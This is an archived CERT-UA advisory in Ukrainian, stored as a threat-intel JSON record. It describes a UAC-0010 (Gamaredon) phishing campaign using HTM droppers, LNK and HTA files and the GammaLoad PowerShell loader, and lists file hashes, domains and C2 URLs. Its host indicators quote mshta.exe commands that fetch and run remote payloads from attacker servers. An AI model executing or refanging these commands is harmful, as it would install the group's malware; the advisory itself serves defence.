{ "id": "6b983df4-4f4b-41da-ace4-650db4ee564f", "created_at": "2026-04-06T00:09:40.724816Z", "updated_at": "2026-04-10T03:37:04.367894Z", "deleted_at": null, "sha1_hash": "8799292d5aaa53a5d41fd66cd1ac06bab97bc828", "title": "CERT-UA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 727532, "plain_text": "CERT-UA\r\nArchived: 2026-04-05 17:24:53 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA виявлено факт\r\nмасового розповсюдження електронних листів з темами \"Інформаційний бюлетень\", \"Бойове\r\nрозпорядження\", в тому числі, начебто, від Національної академії СБ України. При цьому, електронні\r\nлисти розсилаються на приватні електронні адреси об'єктів атаки.\r\nВ додатку до листа знаходиться HTM-дропер, відкриття якого призведе до створення на комп'ютері RAR-архіву, наприклад \"22_07_2022.rar\". Останній містить LNK-файл з релевантною для жертви назвою,\r\nнаприклад, \"Інформаційний бюлетень Департаменту контрозвідки Служби безпеки України від 22 липня\r\n2022 року.lnk\", а запуск файлу-ярлика призведе до завантаження і виконання HTA-файлу.\r\nЗгаданий HTA-файл може містити VBScript-код, який, за допомогою PowerShell, здійснить декодування та\r\nзапуск шкідливої програми GammaLoad.PS1_v2.\r\nЗауважимо, що зловмисники намагаються уникнути DNS-резолвів доменних імен серверів управління, для\r\nчого, з метою отримання A-записів (IP-адрес), використовуться сторонні сервіси, наприклад:\r\nhxxps://cloudflare-dns[.]com/dns-query, hxxps://whoer[.]net/ru/checkwhois та інші.\r\nПринагідно відмічаємо підвищення інтенсивності атак із застосуванням описаних тактик та закликаємо до\r\nвжиття системних заходів зі зменшення поверхні атаки (attack surface management), адже, наприклад,\r\nвикористання сторонніх поштових сервісів на службовому обладнання нівелює існуючий периметр\r\nбезпеки (вміст і вкладення електронних листів не перевіряються засобами захисту).\r\nОписана активність здійснюється групою UAC-0010 (Armageddon).\r\nІндикатори компрометації\r\nФайли:\r\nc5977405d69f735f746354175b53f12c bea69eac34c2b42108c857031e5c25fe9313ed64c22ff2fc95f30504da4c5\r\nb307698a3b5134ea0708ed2222fb42f2 82a696d8f21ba738c0af474061c79584fefcfea5627b221b78a24fcf94dd1\r\na407ac0d454724527b6f8da72f9ee1c0 22d1fe7676b26480e7d47b48dc19d9b3959662fb2c94fb06d2d3d170a31ea\r\n680a5bcbe5b068ee433c5bc35cde5d40 7cca81a2e043e2a87cda812275e1817a6f35ede75d83f76bad8f7ffa6f7e6\r\n4489ab1c55dd32ea26528d97897e71ba 8e61bacc1d524885ea5f0bcdaabbfd56c2234ea62c10a9442d65444cab934\r\nc5da0a4385b07aa63432005b7359d3d0 3e027bfad251a13b4765801cfa31692bdc057493061e04496c3e2667d8aee\r\n5dbb7b2c33635478a369b8fd40e2d8b3 ef0ee60ccfb9418fea42c62aec3b7450cb4c14f15baf8b81139ccd4086a7c\r\nb8aa1ca84adea55dcc0244ff12975400 af874c478a939641b21b96688855c4bc663797e6ba4af4f60f8fa1b6c1428\r\n2b333fc9d4ad9eed100a3644d40b4755 0608ae0f28510591798a1603adabde86a9dbd67e1bfb1713c3f397d0d1a30\r\n903f87bef3f32d010deed6de78d1ade9 de9051d876961d2eebdeb4a2b0dbbc1da50f941cd638eb0aeaaacc4d3858f\r\nhttps://cert.gov.ua/article/971405\r\nPage 1 of 3\n\nb8aa1ca84adea55dcc0244ff12975400 af874c478a939641b21b96688855c4bc663797e6ba4af4f60f8fa1b6c1428\r\n3d822040f77a2027643d37c063022751 9d1dc7f559272903b9e3b35ed410862260e42fe4058b21750b27d68e8f229\r\n419861397bb302c1e6b663d26982e578 84561b3db51327b059bbbab02a3d93d9fb89d5de080cbb8ebeaef7d5365f2\r\nc1c7da54905571a002b467109e56d423 508040716bb3d3f58fa6b58dd3ee52343f1a228f79d374e80e79751c8f446\r\nc57bd947e15a858f629979c8390d3414 980181feb0b5844036f2c99007cbe4bf9fb3ef2af940d5d8d7b957debad20\r\n5c70578e4250274b92c9618abe59b238 811860d330b9335e4c0083c7d4121969b59d8b7dc475819310d894d7572ce\r\n9c73bd03e4c5d9796e9807c036ad51e1 98328773322c3bcec11105d7411bdde27f6663f33e01dae32a429226138e8\r\nee3661a8a6a1acf33e53f52a1e3a5533 315fdf6913cdcc1b94d3a43df12943164c8f30b89fbd69ccf8a254ca8d2de\r\n1fc26cefdaa10012be05c6252033b773 5a4b20a44ca8a10c9536ec2119593b22a57537cd9dbc6027d476fd2e74e07\r\nf459762a57d192d6a01c0177643fea28 ab7e2bb12bf98a022bfb239c55a514af6c6fcfe8c7c92ab77fc97a50a3126\r\n8906218a0149a9ea8bffd7619b43a2c1 6c6d1465de0e045399731440df5b54fdd91d50b4ddf8244bec62c1883b40b\r\n91e4483615813398e61a7bef46c1e005 d530343732d149b5d681b54e83394211fd9e811b5ca88b1c23c132593605d\r\nb8182f549d6b08b8fe0e58f9d5292650 07323a7ecf084a1bb6cb81505dfd934c2706491053664588b3b5b065e3fb4\r\nc88ce71fafbbccb1a8b3e5f9f8e8b771 47c10e67cc06c99a1d5e1f7f1f60cd516b8445df53419517e0e1f2bfdcab3\r\ne96bd54cc8c9b26fa5020fe55ef4d25f b11f450a395ea22a71a5fd7f381783ec9e5639f68796b6a0a200ec8904ebc\r\nc7e81154fd9906fdd91f9053a24b19ce 9569b0d2bd15beb7ae6ec17a3fb656f016693971d12c8d38b4de998c32055\r\nМережеві:\r\na0695487.xsph[.]ru\r\na0698262.xsph[.]ru\r\na0698649.xsph[.]ru\r\nfishitor[.]ru\r\nleonardis[.]ru\r\nmail-box[.]site\r\nfast-mail[.]site\r\nyour-mail[.]press\r\nhXXps://t[.]me/s/topnewsas\r\nhXXp://a0695487.xsph[.]ru/relationship/preservation.xml\r\nhXXp://a0695487.xsph[.]ru/banisters/guess.xml\r\nhXXp://a0698262.xsph[.]ru/see/guilty.xml\r\nhXXp://a0698649.xsph[.]ru/reliance/grudge.xml\r\nhXXp://a0698262.xsph[.]ru/see/guilty.xml\r\nhXXp://a0698649.xsph[.]ru/nervous/Queen.xml\r\nhXXp://a0698649.xsph[.]ru/selection/headache.xml\r\nhXXp://a0698262.xsph[.]ru/quickly/neville.xml\r\nhXXp://164[.]92.166.107/index[.]php\r\nhXXp://45[.]63.114.110/index[.]php\r\nhXXp://159[.]223.218.10/index[.]php\r\nhXXps://cloudflare-dns[.]com/dns-query?name=%C2DOMAIN%\u0026type=aaa (легітимний сервіс)\r\nhXXps://whoer[.]net/ru/checkwhois (легітимний сервіс)\r\nhXXp://194[.]67.87.33/CCLEANER123[.]db?=detachment\r\nvisnik-ssu@mail-box[.]site\r\nhttps://cert.gov.ua/article/971405\r\nPage 2 of 3\n\ndnipro@fast-mail[.]site\r\nvisnik-ssu@your-mail[.]press\r\nХостові:\r\n%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c \"\"$per = [Enum]::ToObject([System.Net.Secu\r\nC:\\Windows\\System32\\mshta.exe http://a0698262.xsph[.]ru/see/guilty.xml /f\r\nC:\\Windows\\System32\\mshta.exe http://a0698649.xsph[.]ru/reliance/grudge.xml /f\r\nC:\\Windows\\System32\\mshta.exe http://a0698649.xsph[.]ru/selection/headache.xml /f\r\nC:\\Windows\\System32\\mshta.exe http://a0695487.xsph[.]ru/relationship/preservation.xml /f\r\nC:\\Windows\\System32\\mshta.exe http://a0695487.xsph[.]ru/banisters/guess.xml /f\r\nC:\\Windows\\System32\\mshta.exe http://a0698649.xsph[.]ru/nervous/Queen.xml /f\r\nC:\\Windows\\System32\\mshta.exe http://a0698262.xsph[.]ru/quickly/neville.xml /f\r\nГрафічні зображення\r\nSource: https://cert.gov.ua/article/971405\r\nhttps://cert.gov.ua/article/971405\r\nPage 3 of 3", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://cert.gov.ua/article/971405" ], "report_names": [ "971405" ], "threat_actors": [ { "id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308", "created_at": "2022-10-25T15:50:23.320841Z", "updated_at": "2026-04-10T02:00:05.356444Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Gamaredon Group", "IRON TILDEN", "Primitive Bear", "ACTINIUM", "Armageddon", "Shuckworm", "DEV-0157", "Aqua Blizzard" ], "source_name": "MITRE:Gamaredon Group", "tools": [ "QuietSieve", "Pteranodon", "Remcos", "PowerPunch" ], "source_id": "MITRE", "reports": null }, { "id": "d5156b55-5d7d-4fb2-836f-861d2e868147", "created_at": "2023-01-06T13:46:38.557326Z", "updated_at": "2026-04-10T02:00:03.023048Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "ACTINIUM", "DEV-0157", "Blue Otso", "G0047", "IRON TILDEN", "PRIMITIVE BEAR", "Shuckworm", "UAC-0010", "BlueAlpha", "Trident Ursa", "Winterflounder", "Aqua Blizzard", "Actinium" ], "source_name": "MISPGALAXY:Gamaredon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61940e18-8f90-4ecc-bc06-416c54bc60f9", "created_at": "2022-10-25T16:07:23.659529Z", "updated_at": "2026-04-10T02:00:04.703976Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Actinium", "Aqua Blizzard", "Armageddon", "Blue Otso", "BlueAlpha", "Callisto", "DEV-0157", "G0047", "Iron Tilden", "Operation STEADY#URSA", "Primitive Bear", "SectorC08", "Shuckworm", "Trident Ursa", "UAC-0010", "UNC530", "Winterflounder" ], "source_name": "ETDA:Gamaredon Group", "tools": [ "Aversome infector", "BoneSpy", "DessertDown", "DilongTrash", "DinoTrain", "EvilGnome", "FRAUDROP", "Gamaredon", "GammaDrop", "GammaLoad", "GammaSteel", "Gussdoor", "ObfuBerry", "ObfuMerry", "PlainGnome", "PowerPunch", "Pteranodon", "Pterodo", "QuietSieve", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "Resetter", "RuRAT", "SUBTLE-PAWS", "Socmer", "UltraVNC" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434180, "ts_updated_at": 1775792224, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8799292d5aaa53a5d41fd66cd1ac06bab97bc828.pdf", "text": "https://archive.orkl.eu/8799292d5aaa53a5d41fd66cd1ac06bab97bc828.txt", "img": "https://archive.orkl.eu/8799292d5aaa53a5d41fd66cd1ac06bab97bc828.jpg" } }